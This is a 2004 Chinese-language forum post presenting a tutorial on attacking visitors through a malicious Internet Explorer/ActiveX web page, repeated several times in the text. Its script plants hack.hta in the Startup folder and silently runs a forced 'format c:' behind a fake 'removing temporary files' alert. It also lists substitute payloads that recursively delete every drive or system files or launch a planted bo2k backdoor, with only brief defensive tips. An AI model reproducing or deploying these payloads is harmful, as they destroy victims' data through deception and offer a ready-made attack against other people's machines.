史萊姆論壇 - 查看單個文章

psac · 2004-10-23, 06:41 AM

文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的。注:文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的.
防護辦法:不執行不知名的Active控件或者把機器中那些不太常用的指令,如format.exe,進行更名.
文章作者︰f\*\*k

前敘︰

這項技術是在沒多久以前台灣所流行的攻擊法，你知道利用漏洞的厲害在哪嗎？

這一項教學就是利用微軟( Microsoft )的IE瀏覽器( Internet Explorer )所衍生出來的
攻擊方法。

教學開始︰

以下這段就是具有破壞性的HTML

Hacking Your Computer .

scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();

(懂HTML的人應該就看得出來其中精隨)

現在我大概來解釋其中幾個項目所寫的意思

scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"

這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下，並命名為hack.hta

wsh.Run('start.exe /m format c:/q /autotest /u');

通常要格式化硬碟都會先問你是否要執行，但其中的"/autotest"這項。

它是一個微軟沒有公開的功能，按鍵輸入後format的動作便會被強制執行。

這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。

最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。

執行其他攻擊指令的方法︰

只要修改「start.exe /m format c:/q /autotest /u」這一項便形。

start.exe /m format c:/q /autotest /u

其中的「c:」可以換做其他的硬碟。

(path)\bo2k.exe

執行它電腦中的某個程式，如果你有傳bo2k到它電腦中就可以使用此指令。

start.exe /m deltree /y a:\*.* c:\*.* d:\*.*

殺掉對方硬碟底下所有的檔案。

start.exe /m deltree /y c:\windows\system\*.*

殺掉對方c:\windows\system\目錄底下的所有檔案。

後敘︰

預防遭此手段的破壞就是到微軟去更新你的瀏覽器。

以下這段就是具有破壞性的HTML

Hacking Your Computer .

scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();

(懂HTML的人應該就看得出來其中精隨)

現在我大概來解釋其中幾個項目所寫的意思

scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"

這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下，並命名為hack.hta

wsh.Run('start.exe /m format c:/q /autotest /u');

通常要格式化硬碟都會先問你是否要執行，但其中的"/autotest"這項。

它是一個微軟沒有公開的功能，按鍵輸入後format的動作便會被強制執行。

這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。

最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。

執行其他攻擊指令的方法︰

只要修改「start.exe /m format c:/q /autotest /u」這一項便形。

start.exe /m format c:/q /autotest /u

其中的「c:」可以換做其他的硬碟。

(path)\bo2k.exe

執行它電腦中的某個程式，如果你有傳bo2k到它電腦中就可以使用此指令。

start.exe /m deltree /y a:\*.* c:\*.* d:\*.*

殺掉對方硬碟底下所有的檔案。

start.exe /m deltree /y c:\windows\system\*.*

殺掉對方c:\windows\system\目錄底下的所有檔案。

後敘︰

預防遭此手段的破壞就是到微軟去更新你的瀏覽器。

2004-10-23, 06:41 AM	#1
psac 榮譽會員榮譽勳章勳章總數19 UID - 3662 在線等級: 註冊日期: 2002-12-07 住址: 木柵市立動物園文章: 17381 精華: 2 現金: 5253 金幣資產: 33853 金幣	超酷手段:通過網頁攻擊客戶端機文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的。注:文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的. 防護辦法:不執行不知名的Active控件或者把機器中那些不太常用的指令,如format.exe,進行更名. 文章作者︰f\\k 前敘︰這項技術是在沒多久以前台灣所流行的攻擊法，你知道利用漏洞的厲害在哪嗎？這一項教學就是利用微軟( Microsoft )的IE瀏覽器( Internet Explorer )所衍生出來的攻擊方法。教學開始︰以下這段就是具有破壞性的HTML Hacking Your Computer . scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"; scr.Doc=" wsh.Run('start.exe /m format c:/q /autotest /u'); alert('IMPORTANT : Windows is removing unused temporary files.');"; scr.write(); (懂HTML的人應該就看得出來其中精隨) 現在我大概來解釋其中幾個項目所寫的意思 scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta" 這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下，並命名為hack.hta wsh.Run('start.exe /m format c:/q /autotest /u'); 通常要格式化硬碟都會先問你是否要執行，但其中的"/autotest"這項。它是一個微軟沒有公開的功能，按鍵輸入後format的動作便會被強制執行。這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。執行其他攻擊指令的方法︰只要修改「start.exe /m format c:/q /autotest /u」這一項便形。 start.exe /m format c:/q /autotest /u 其中的「c:」可以換做其他的硬碟。 (path)\bo2k.exe 執行它電腦中的某個程式，如果你有傳bo2k到它電腦中就可以使用此指令。 start.exe /m deltree /y a:\. c:\. d:\. 殺掉對方硬碟底下所有的檔案。 start.exe /m deltree /y c:\windows\system\. 殺掉對方c:\windows\system\目錄底下的所有檔案。後敘︰預防遭此手段的破壞就是到微軟去更新你的瀏覽器。以下這段就是具有破壞性的HTML Hacking Your Computer . scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"; scr.Doc=" wsh.Run('start.exe /m format c:/q /autotest /u'); alert('IMPORTANT : Windows is removing unused temporary files.');"; scr.write(); (懂HTML的人應該就看得出來其中精隨) 現在我大概來解釋其中幾個項目所寫的意思 scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta" 這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下，並命名為hack.hta wsh.Run('start.exe /m format c:/q /autotest /u'); 通常要格式化硬碟都會先問你是否要執行，但其中的"/autotest"這項。它是一個微軟沒有公開的功能，按鍵輸入後format的動作便會被強制執行。這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。執行其他攻擊指令的方法︰只要修改「start.exe /m format c:/q /autotest /u」這一項便形。 start.exe /m format c:/q /autotest /u 其中的「c:」可以換做其他的硬碟。 (path)\bo2k.exe 執行它電腦中的某個程式，如果你有傳bo2k到它電腦中就可以使用此指令。 start.exe /m deltree /y a:\. c:\. d:\. 殺掉對方硬碟底下所有的檔案。 start.exe /m deltree /y c:\windows\system\. 殺掉對方c:\windows\system\目錄底下的所有檔案。後敘︰預防遭此手段的破壞就是到微軟去更新你的瀏覽器。

	送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次